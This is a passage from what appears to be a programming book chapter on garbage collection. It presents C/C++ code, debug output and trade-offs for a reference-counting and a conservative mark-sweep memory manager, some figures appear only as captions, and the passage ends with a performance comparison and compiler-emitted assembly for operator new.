SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
}
}
else if((COUNT(prev)!=FREE)&&(COUNT(next)!=FREE))
{
COUNT(current)=FREE;
}
else if((COUNT(prev)!=FREE)&&(COUNT(next)==FREE))
{
U4 temp;
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to NEXT\n");
COUNT(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((COUNT(prev)==FREE)&&(COUNT(next)!=FREE))
{
MSG0("RefCountMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((COUNT(prev)==FREE)&&(COUNT(next)==FREE))
{
U4 temp;
MSG0("RefCountMemoryManager::merge():");
MSG0("merging with both sides\n");
SIZE(prev)=SIZE(prev)+
SIZE(current)+SZ_HEADER+
SIZE(next)+SZ_HEADER;
NEXT(prev)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=prev; }
}
return;
}/*end merge--------------------------------------------------*/
void RefCountMemoryManager::printState()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
if(COUNT(current)==FREE){ printf("[FREE]"); }
else{ printf("[Ct=%lu]",COUNT(current)); }
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
current = NEXT(current);
i++;
}
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
if(COUNT(current)==FREE){ printf("[FREE]"); }
else{ printf("[Ct=%lu]",COUNT(current)); }
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
return;
}/*end printState---------------------------------------------*/
Tests
I performed two different tests against this memory manager. A
debug test was performed to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The following output was generated by the debug build of the
memory manager:
RefCountMemoryManager::RefCountMemoryManager(270)
RefCountMemoryManager::allocate(8)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][FREE][Sz=230][N=0]
RefCountMemoryManager::allocate(12)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][FREE][Sz=202][N=0]
RefCountMemoryManager::allocate(33)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][FREE][Sz=153][N=0]
RefCountMemoryManager::allocate(1)
RefCountMemoryManager::split(): split=YES
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][Ct=1][Sz=1][N=134]
4) [P=117][addr=134][FREE][Sz=136][N=0]
RefCountMemoryManager::allocate(122)
RefCountMemoryManager::split(): split=NO
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][Ct=1][Sz=1][N=134]
4) [P=117][addr=134][Ct=1][Sz=136][N=0]
RefCountMemoryManager::allocate(50)
0) [P=0][addr=16][Ct=1][Sz=8][N=40]
1) [P=16][addr=40][Ct=1][Sz=12][N=68]
2) [P=40][addr=68][Ct=1][Sz=33][N=117]
3) [P=68][addr=117][Ct=1][Sz=1][N=134]
4) [P=117][addr=134][Ct=1][Sz=136][N=0]
ptr[5]==NULL!
copying ptr[0]
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::inc(): address resolves to index 16
RefCountMemoryManager::inc(): incrementing ram[16] to 2
copying ptr[1]
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::inc(): address resolves to index 40
RefCountMemoryManager::inc(): incrementing ram[40] to 2
copying ptr1
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::inc(): address resolves to index 16
RefCountMemoryManager::inc(): incrementing ram[16] to 3
overwriting ptr2 with ptr3
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::dec(): address resolves to index 16
RefCountMemoryManager::dec(): decrementing ram[16] to 2
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::inc(): address resolves to index 40
RefCountMemoryManager::inc(): incrementing ram[40] to 3
leaving scope
...
RefCountMemoryManager::checkAddress(): cannot release NULL pointer
RefCountMemoryManager::checkAddress(5439516)
RefCountMemoryManager::dec(): address resolves to index 16
RefCountMemoryManager::dec(): decrementing ram[16] to 0
RefCountMemoryManager::dec(): releasing ram[16]
0) [P=0][addr=16][FREE][Sz=8][N=40]
1) [P=16][addr=40][Ct=2][Sz=12][N=68]
2) [P=40][addr=68][FREE][Sz=202][N=0]
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::dec(): address resolves to index 40
RefCountMemoryManager::dec(): decrementing ram[40] to 1
RefCountMemoryManager::checkAddress(5439540)
RefCountMemoryManager::dec(): address resolves to index 40
RefCountMemoryManager::dec(): decrementing ram[40] to 0
RefCountMemoryManager::dec(): releasing ram[40]
Trade-Offs
The reference counting approach to garbage collection is convenient
because it offers a type of collection that is incremental, which is to
say that the bookkeeping needed to reclaim garbage is done in
short, bite-sized bursts. This allows the memory manager to do its
job without introducing a significant time delay into the program's
critical path. Some garbage collectors wait to do everything at once
so that users may experience a noticeable pause while a program
runs.
While the reference counting approach is fast, it also suffers from
some serious problems. For example, reference counting garbage
collectors cannot reclaim objects that reference each other. This is
known as a cycle (see Figure 5.4).
Figure 5.4
#include<stdio.h>
#include<stdlib.h>
void function()
{
void **A; //points to a value that stores an address
void **B;
A = (void**)malloc(sizeof(void*));
B = (void**)malloc(sizeof(void*));
*A = (void*)B; //A's block now references B's block
*B = (void*)A; //B's block now references A's block: a cycle
printf("address A=%p\t",A);
printf("value in A=%p\n\n",*A);
printf("address B=%p\t",B);
printf("value in B=%p\n",*B);
return;
}
void main()
{
function();
return;
}
If the variable A goes out of scope, its heap storage will still not be
reclaimed. This is because B still references it so that its reference
count is 1. The same holds true for B. Because of the pointer tom-
foolery performed, and because of the nature of reference counting,
neither of these blocks of memory will ever have their storage
reclaimed because their reference counts will never be able to reach
zero.
NOTE The ugly truth is that the inability to handle cyclic references
is what allows reference counting schemes to develop memory leaks.
This is one reason why most run-time systems, like the Java virtual
machine, avoid reference counting garbage collection.
Figure 5.5
Figure 5.6
QUESTION
OK, so if the manager looks for pointers, what does a pointer
look like?
ANSWER
Some compilers add a special tag to pointers. The problem
with this approach is that the tag consumes part of a pointer’s
storage space and prevents a pointer from being capable of
referencing the full address space. I decided that in my imple-
mentation, I would use a conservative garbage collection approach
and consider any 32-bit value to be a potential pointer. This basi-
cally means that I have to scan memory byte-by-byte to
enumerate every possible 32-bit value (see Figure 5.7).
Figure 5.7
Figure 5.8
NOTE This function does not suggest that garbage collection occur;
it demands that garbage collection occur.
Implementation
I decided to implement a mark-sweep garbage collector by
modifying the sequential fit implementation in Chapter 4. My
implementation of the mark-sweep memory manager required four
files:
Table 5.2
File Use
driver.cpp contains main(), is the scene of the crime
mallocV5.cpp newMalloc() and forceCollection() wrappers (5th version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the MarkSweepMemoryManager class
driver.cpp
This file contains the main() entry point. You can build my imple-
mentation to execute a diagnostic test or a performance test. To
build the diagnostic version, you will need to comment out the
PerformanceTestDriver() invocation and uncomment the
debugTest() invocation. You will also need to activate the
DEBUG_XXX macros in the mallocV5.cpp file.
#include<mallocV5.cpp>
#include<perform.cpp>
void debugTest()
{
void *ptr;
void *ptr1;
void *ptr2;
unsigned long *lptr;
unsigned long allocs[6]={8,12,33,1,122,50};
printf("address of ptr = %p\n",&ptr);
printf("address of ptr1 = %p\n",&ptr1);
printf("address of ptr2 = %p\n",&ptr2);
printf("address of lptr = %p\n",&lptr);
printf("address of allocs = %p\n",&allocs);
initMemMgr(270,4);
//8
ptr = newMalloc(allocs[0]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
//12
ptr = newMalloc(allocs[1]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
ptr2=ptr;
//33
ptr = newMalloc(allocs[2]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
lptr=(unsigned long*)ptr;
*lptr =(unsigned long)ptr; /*plant the block's own address inside it*/
lptr=NULL;
//1
//first garbage collection here
ptr = newMalloc(allocs[3]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
//122
ptr = newMalloc(allocs[4]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
ptr1=ptr;
forceCollection();
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//need this for mark-sweep
getTOS();
//for the debug test, should activate debug macros in mallocVx.cpp
//debugTest();
//for the performance test, should comment out debug macros
PerformanceTestDriver();
return;
}/*end main---------------------------------------------------*/
You might notice a weird-looking function called getTOS(), which is
invoked in main(). This is the first statement in main(), and it
resolves to a macro defined in memmgr.cpp. This macro, which
stands for get Top Of the Stack, obtains the value of the EBP register
that my code knows where to stop its scan of the stack while look-
ing for pointers. The main() function, like other C functions, has a
prologue that sets up the EBP register as a stack frame pointer.
_main PROC NEAR
push ebp
mov ebp, esp
By saving the value of EBP as soon as main() begins, I ensure that
I can scan as much of the stack as legally possible.
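Conceptually, the macro only has to copy EBP into the global stackFrameBase variable. A one-line sketch of how this could be written, assuming Visual C++ inline assembly on x86:
#define getTOS() _asm{ MOV stackFrameBase,EBP }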
mallocV5.cpp
Because we are now in the domain of automatic memory manage-
ment, I disabled the newFree() function that has traditionally
been defined in this file. The newMalloc() function is still opera-
tional, albeit using a different underlying object. If you wish to
perform a debug/diagnostic test, you will need to activate the
DEBUG_XXX macros.
You also might want to keep in mind that I have included a
forceCollection() wrapper function that allows you to invoke
the garbage collector.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_MS_MEM_MGR
//#define DEBUG_MALLOCV5
#include<memmgr.cpp>
/*
wrapper functions
*/
MarkSweepMemoryManager *mmptr;
void initMemMgr(unsigned long totalbytes,unsigned char period)
{
mmptr = new MarkSweepMemoryManager(totalbytes,period);
}
void closeMemMgr()
{
delete(mmptr);
}
void *newMalloc(unsigned long size)
{
void *ptr = (*mmptr).allocate(size);
#ifdef DEBUG_MALLOCV5
(*mmptr).printState();
#endif
return(ptr);
}
void forceCollection()
{
(*mmptr).forceCollection();
return;
}
perform.cpp
The PerformanceTest class defined in this file has not been
modified very much. The only thing that changed was the imple-
mentation of the runTest() member function. Specifically, I had
to remove the calls to newFree(), which are no longer valid. I also
replaced the array of void*addr[] pointers with a single addr
pointer so that I could overwrite its contents and produce garbage.
unsigned long PerformanceTest::runTest()
{
unsigned long *allocs;
unsigned long i;
unsigned long ticks1,ticks2;
void *addr;
getAllocArray(allocs);
initMemMgr(1024*1024,200);
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
addr = (char *)newMalloc(allocs[i]);
if(addr==NULL)
{
printf("mallco()=addr[%lu]=%lu failed\n",i,addr);
exit(1);
}
}
forceCollection();
ticks2 = GetTickCount();
closeMemMgr();
free(allocs);
return(ticks2-ticks1);
}/*end runTest------------------------------------------------*/
memmgr.cpp
The MarkSweepMemoryManager class defined in this file is
basically an extended version of the SequentialFitMemory-
Manager. To give you an idea of how this class operates, I have
enumerated the possible paths of execution for this class in Figure
5.9.
Figure 5.9
#ifdef DEBUG_MS_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0 3||4 7|| 8 ||9 12||13 .. n|
[PREV][NEXT][STATE][SIZE][payload]
U4 U4 U1 U4 ?
*/
/*header fields occupy the 13 bytes that precede each block's payload*/
#define SZ_HEADER 13
#define START SZ_HEADER
#define PREV(i) (*((U4*)&ram[(i)-13]))
#define NEXT(i) (*((U4*)&ram[(i)-9]))
#define STATE(i) (*((U1*)&ram[(i)-5]))
#define SIZE(i) (*((U4*)&ram[(i)-4]))
#define FREE 0
#define OCCUPIED 1
#define TESTING 2
char *stateStr[3]={"FREE","OCCUPIED","TESTING"};
U4 stackFrameBase;
class MarkSweepMemoryManager
{
private:
HANDLE handle;
U1 *ram; //pointer to memory storage
U4 size; //nbytes in storage
U1 ticks; //used to trigger collection
U1 period; //# ticks before collect
void trace();
void mark();
void traverseStack();
void traverseHeap();
void traverseMemory(U1 *addr,U4 nbytes);
int checkAddress(void *addr);
void sweep();
void split(U4 addr,U4 nbytes);
void release(U4 index);
void merge(U4 prev,U4 current,U4 next);
public:
MarkSweepMemoryManager(U4 nbytes,U1 maxticks);
~MarkSweepMemoryManager();
void*allocate(U4 nbytes);
void forceCollection();
void printState();
};
MarkSweepMemoryManager::MarkSweepMemoryManager(U4 nbytes,U1 maxticks)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("MarkSweepMemoryManager::");
printf("MarkSweepMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<=SZ_HEADER)
{
printf("MarkSweepMemoryManager::");
printf("MarkSweepMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
PREV(START)=0;
NEXT(START)=0;
STATE(START)=FREE;
SIZE(START)=size-SZ_HEADER;
MSG0("MarkSweepMemoryManager::");
MSG1("MarkSweepMemoryManager(): ram[%lu], ",nbytes);
ticks = 0;
period = maxticks;
MSG1("ticks=%u, ",ticks);
MSG1("period=%u\n",period);
return;
}/*end constructor--------------------------------------------*/
MarkSweepMemoryManager::~MarkSweepMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("MarkSweepMemoryManager::");
printf("~MarkSweepMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("MarkSweepMemoryManager::");
MSG0("~MarkSweepMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
void* MarkSweepMemoryManager::allocate(U4 nbytes)
{
U4 current;
MSG0("MarkSweepMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("MarkSweepMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
ticks++;
MSG0("MarkSweepMemoryManager::");
MSG1("allocate(): gc check -> [ticks,period]=[%u,",ticks);
MSG1("%u]\n",period);
if(ticks==period)
{
trace();
ticks=0;
}
current = START;
while(NEXT(current)!=0)
{
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
current = NEXT(current);
}
if((SIZE(current)>=nbytes)&&(STATE(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
breaks [free] region into [alloc][free] pair, if possible
*/
void MarkSweepMemoryManager::split(U4 addr,U4 nbytes)
{
if(SIZE(addr)>=nbytes+SZ_HEADER+SZ_HEADER)
{
U4 oldnext;
U4 oldprev;
U4 oldsize;
U4 newaddr;
MSG0("MarkSweepMemoryManager::");
MSG0("split(): split=YES\n");
oldnext=NEXT(addr);
oldprev=PREV(addr);
oldsize=SIZE(addr);
newaddr = addr+nbytes+SZ_HEADER; /*first byte of the new free block's payload*/
NEXT(addr)=newaddr;
PREV(addr)=oldprev;
STATE(addr)=OCCUPIED;
SIZE(addr)=nbytes;
NEXT(newaddr)=oldnext;
PREV(newaddr)=addr;
STATE(newaddr)=FREE;
SIZE(newaddr)=oldsize-nbytes-SZ_HEADER;
}
else
{
MSG0("MarkSweepMemoryManager::");
MSG0("split(): split=NO\n");
STATE(addr)=OCCUPIED;
}
return;
}/*end split--------------------------------------------------*/
void MarkSweepMemoryManager::forceCollection()
{
MSG0("MarkSweepMemoryManager::");
MSG0("forceCollection(): forcing collection\n");
trace();
return;
}/*end forceCollection----------------------------------------*/
void MarkSweepMemoryManager::trace()
{
MSG0("MarkSweepMemoryManager::");
MSG0("trace(): initiating mark-sweep\n");
mark();
sweep();
return;
}/*end trace--------------------------------------------------*/
void MarkSweepMemoryManager::mark()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
if(STATE(current)==OCCUPIED)
{
STATE(current)=TESTING;
}
current = NEXT(current);
i++;
}
if(STATE(current)==OCCUPIED)
{
STATE(current)=TESTING;
}
#ifdef DEBUG_MS_MEM_MGR
MSG0("MarkSweepMemoryManager::");
MSG0("mark(): toggle OCCUPIED to TESTING\n");
printState();
#endif
MSG0("MarkSweepMemoryManager::");
MSG0("mark(): initiating stack and heap traversals\n");
traverseStack();
traverseHeap();
return;
}/*end mark---------------------------------------------------*/
void MarkSweepMemoryManager::traverseStack()
{
U4 currentAddr;
/*capture the current stack pointer (Visual C++ inline assembly)*/
_asm{ MOV currentAddr,ESP };
MSG0("MarkSweepMemoryManager::traverseStack():");
MSG1("EBP=%p\t",stackFrameBase);
MSG1("ESP=%p\n",currentAddr);
traverseMemory((U1*)currentAddr,(stackFrameBase-currentAddr));
return;
}/*end traverseStack------------------------------------------*/
void MarkSweepMemoryManager::traverseHeap()
{
MSG0("MarkSweepMemoryManager::traverseHeap(): looking at
heap\n");
traverseMemory(ram,size);
return;
}/*end traverseHeap-------------------------------------------*/
void MarkSweepMemoryManager::traverseMemory(U1 *addr,U4 nbytes)
{
U4 i;
U4 start;
U4 end;
U4 *iptr;
start = (U4)addr;
end = start + nbytes -1;
MSG0("MarkSweepMemoryManager::traverseMemory(): ");
MSG1("[start=%lx,",start);
MSG1(" end=%lx]\n",end);
for(i=start;i<=end-3;i++)
{
//point to the 32-bit value that begins at memory address i
iptr = (U4*)i;
//treat that value as a potential pointer into the heap
checkAddress((void*)(*iptr));
}
return;
}/*end traverseMemory-----------------------------------------*/
int MarkSweepMemoryManager::checkAddress(void *addr)
{
U4 index;
if(addr==NULL){ return(FALSE); }
/*ignore values that do not fall within the managed heap*/
if( (addr<(void*)&ram[0]) || (addr>=(void*)&ram[size]) ){ return(FALSE); }
index = (U4)( ((U1*)addr) - ram );
if(index<SZ_HEADER){ return(FALSE); }
if(STATE(index)!=TESTING)
{
MSG0("MarkSweepMemoryManager::checkAddress(): ");
MSG1("failed sanity chk (already found) addr=%p ",addr);
return(FALSE);
}
MSG0("MarkSweepMemoryManager::checkAddress(): ");
MSG1("live memory block at addr=%p ",addr);
MSG1("index=%lu\n",index);
STATE(index)=OCCUPIED;
return(TRUE);
}/*end checkAddress-------------------------------------------*/
void MarkSweepMemoryManager::sweep()
{
U4 i;
U4 current;
MSG0("MarkSweepMemoryManager::");
MSG0("sweep(): link sweep intiated\n");
i=0;
current=START;
while(NEXT(current)!=0)
{
if(STATE(current)==TESTING)
{
MSG0("MarkSweepMemoryManager::");
MSG1("sweep(): garbage found at index=%lu\n",
current);
release(current);
}
current = NEXT(current);
i++;
}
if(STATE(current)==TESTING)
{
MSG0("MarkSweepMemoryManager::");
MSG1("sweep(): garbage found at index=%lu\n",current);
release(current);
}
return;
}/*end sweep--------------------------------------------------*/
void MarkSweepMemoryManager::release(U4 index)
{
if(index<SZ_HEADER)
{
MSG0("MarkSweepMemoryManager::");
MSG0("release(): address in first 13 bytes\n");
return;
}
merge(PREV(index),index,NEXT(index));
#ifdef DEBUG_MS_MEM_MGR
MSG0("MarkSweepMemoryManager::");
MSG0("release(): post merge layout\n");
printState();
#endif
return;
}/*end release------------------------------------------------*/
void MarkSweepMemoryManager::merge(U4 prev,U4 current,U4 next)
{
if(prev==0)
{
if(next==0)
{
STATE(current)=FREE;
}
else if((STATE(next)==OCCUPIED)||(STATE(next)==TESTING))
{
STATE(current)=FREE;
}
else if(STATE(next)==FREE)
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
}
else if(next==0)
{
if((STATE(prev)==OCCUPIED)||(STATE(prev)==TESTING))
{
STATE(current)=FREE;
}
else if(STATE(prev)==FREE)
{
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
}
}
/*
cases:
OTO -> OFO
TTT TFT
TTO TFO
OTT OFT
OTF O[F]
TTF T[F]
FTO [F]O
FTT [F]T
FTF [F]
*/
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==OCCUPIED))
{
STATE(current)=FREE;
}
else if((STATE(prev)==TESTING)&&(STATE(next)==TESTING))
{
STATE(current)=FREE;
}
else if((STATE(prev)==TESTING)&&(STATE(next)==OCCUPIED))
{
STATE(current)=FREE;
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==TESTING))
{
STATE(current)=FREE;
}
else if((STATE(prev)==OCCUPIED)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((STATE(prev)==TESTING)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to NEXT\n");
STATE(current)=FREE;
SIZE(current)=SIZE(current)+SIZE(next)+SZ_HEADER;
NEXT(current)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=current; }
}
else if((STATE(prev)==FREE)&&(STATE(next)==OCCUPIED))
{
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((STATE(prev)==FREE)&&(STATE(next)==TESTING))
{
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging to PREV\n");
SIZE(prev)=SIZE(prev)+SIZE(current)+SZ_HEADER;
NEXT(prev)=NEXT(current);
PREV(next)=prev;
}
else if((STATE(prev)==FREE)&&(STATE(next)==FREE))
{
U4 temp;
MSG0("MarkSweepMemoryManager::merge():");
MSG0("merging with both sides\n");
SIZE(prev)=SIZE(prev)+
SIZE(current)+SZ_HEADER+
SIZE(next)+SZ_HEADER;
NEXT(prev)=NEXT(next);
temp = NEXT(next);
if(temp!=0){ PREV(temp)=prev; }
}
return;
}/*end merge--------------------------------------------------*/
void MarkSweepMemoryManager::printState()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
current = NEXT(current);
i++;
}
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
return;
}/*end printState---------------------------------------------*/
Tests
I performed two different tests against this memory manager. A
debug test was performed to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The debug test was performed by executing the code in the
debugTest() function defined in the driver.cpp source file. I
keep things fairly simple, but at the same time, I take a good, hard
look at what is going on. If you decide to run a debug test, you will
want to make sure that the DEBUG_XXX macros in
mallocV5.cpp are turned on. You will also want to comment out
the PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager:
address of ptr = 0065FDE0
address of ptr1 = 0065FDC0
address of ptr2 = 0065FDBC
address of lptr = 0065FDC4
address of allocs = 0065FDC8
MarkSweepMemoryManager::MarkSweepMemoryManager(): ram[270],
ticks=0, period=4
MarkSweepMemoryManager::allocate(8)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[1,4]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=FREE][Sz=236][N=0]
MarkSweepMemoryManager::allocate(12)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[2,4]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=FREE][Sz=211][N=0]
MarkSweepMemoryManager::allocate(33)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[3,4]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
MarkSweepMemoryManager::allocate(1)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[4,4]
MarkSweepMemoryManager::trace(): initiating mark-sweep
MarkSweepMemoryManager::mark(): toggle OCCUPIED to TESTING
0) [P=0][addr=13][St=TESTING][Sz=8][N=34]
1) [P=13][addr=34][St=TESTING][Sz=12][N=59]
2) [P=34][addr=59][St=TESTING][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
MarkSweepMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=122][N=240]
4) [P=105][addr=240][St=FREE][Sz=30][N=0]
MarkSweepMemoryManager::allocate(50)
MarkSweepMemoryManager::allocate(): gc check ->
[ticks,period]=[2,4]
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=122][N=240]
4) [P=105][addr=240][St=FREE][Sz=30][N=0]
ptr==NULL!
The code that produced this output is a fragment of debugTest():
//8
ptr = newMalloc(allocs[0]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
//12
ptr = newMalloc(allocs[1]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
ptr2=ptr;
//33
ptr = newMalloc(allocs[2]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
lptr=(unsigned long*)ptr;
*lptr =(unsigned long)ptr;
lptr=NULL;
//1
//first garbage collection here
ptr = newMalloc(allocs[3]); if(ptr==NULL){ printf("ptr==NULL!\n"); }
The ptr variable has overwritten itself several times and will point
to the most recent heap allocation. In addition, a variable in the
heap, initially pointed to by lptr, stores an address belonging to
the heap.
When the newMalloc(allocs[3]) code has been reached,
the ticks variable will be equal to 4, and garbage collection will
occur. This will cause the 8-byte block that was allocated first to be
reclaimed. All the other allocated heap blocks still have “live”
pointers.
Once garbage collection has occurred, the following code will
execute:
//122
ptr = newMalloc(allocs[4]);
if(ptr==NULL){ printf("ptr==NULL!\n"); }
ptr1=ptr;
forceCollection();
Trade-Offs
While my mark-sweep collector does not exactly compete with the
reference counting version, it does successfully handle the
cyclic-reference problem that caused a memory leak in the previous
implementation. With a little refinement, I could probably whittle
down the performance time to less than 100 milliseconds. I will
present some suggestions for improvement at the end of this
chapter.
Figure 5.10
Because all the “live” pointers on the stack, in the heap, and in the
data segment need to be updated with new values when the mem-
ory blocks that they point to are relocated, copying collection can be
difficult. Not only does this add complexity, but these extra steps
also hurt execution time. In addition, extra storage space is needed
to serve as a destination for the blocks being copied.
Performance Comparison
At this point, it might be enlightening to gather all of the statistics
from the past two chapters together:
Table 5.5
Algorithm            Time to Service 1,024 Requests
bit map              856 milliseconds
sequential fit       35 milliseconds
segregated lists     5 milliseconds
reference counting   30 milliseconds
mark-sweep           430 milliseconds
Potential Additions
The mark-sweep garbage collector that I provided in this chapter
was a bare-bones implementation (and that is an understatement). I
deliberately kept things as simple as I could so that you could grasp
the big picture without being bogged down with details. Seeing as
how my mark-sweep collector has only a minimal feature set, I
thought it might be wise to point out a few additions that could
round out its functionality.
In addition to requesting storage from the heap via the new opera-
tor, most compilers will also emit the code necessary to pass the
new object to its constructor:
; invoke the new operator, allocate 12 bytes
push 12 ; 0000000cH
call ??2@YAPAXI@Z ; operator new
add esp, 4
; pass allocated memory (the object) to the constructor
push 15 ; 0000000fH
mov ecx, DWORD PTR $T196[ebp]
call ??0BluePrint@@QAE@H@Z ; BluePrint::BluePrint
mov DWORD PTR -36+[ebp], eax
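For reference, C++ source along the following lines would produce a
listing like the one above. Only the class name, the 12-byte
allocation, and the constructor argument of 15 come from the listing;
the class body itself is a guess:
//hypothetical layout; three 4-byte fields account for the 12 bytes
class BluePrint
{
    int x;
    int y;
    int z;
    public:
    BluePrint(int n){ x=n; y=n; z=n; }
};
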